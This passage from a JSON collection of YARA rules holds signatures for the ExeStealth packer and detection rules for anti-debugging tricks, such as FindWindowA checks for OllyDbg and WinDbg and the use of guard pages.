B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 74 28 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 C5 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule ExeStealth_WebToolMaster_additional: PEiD\r\n{\r\n strings:\r\n $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster_h: PEiD\r\n{\r\n strings:\r\n $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}"
},
{
"id": 82,
"key": "yara_detect_findwindow",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_FindWindow",
"rule": "import \"pe\"\r\n\r\nrule Detect_FindWindowA_iat {\r\n\tmeta:\r\n\t\tAuthor = \"http://twitter.com/j0sm1\"\r\n\t\tDescription = \"it's checked if FindWindowA() is imported\"\r\n\t\tDate = \"20/04/2015\"\r\n\t\tReference = \"http://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide#OllyFindWindow\"\r\n\tstrings:\r\n\t\t$ollydbg = \"OLLYDBG\"\r\n\t\t$windbg = \"WinDbgFrameClass\"\r\n\tcondition:\r\n\t\tpe.imports(\"user32.dll\",\"FindWindowA\") and ($ollydbg or $windbg)\r\n}"
},
{
"id": 68,
"key": "yara_detect_guardpages",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_GuardPages",
"rule": "rule Detect_GuardPages: AntiDebug {\r\n meta: \r\n description = \"Detect Guard Pages as anti-debug\"\r\n author = \"Unprotect\"\r\n comment = \"Experimental rule\"\r\n strings:\r\n $1 = \"GetSystemInfo\" fullword ascii\r\n $2 = \"VirtualAlloc\" fullword ascii\r\n $3 = \"RtlFillMemory\" fullword ascii\r\n $4 =\"VirtualProtect\" fullword ascii\r\n $5 =\"VirtualFree\" fullword ascii\r\n condition: \r\n uint16(0) == 0x5A4D and filesize < 1000KB and 4 of them \r\n}"
}
]
}
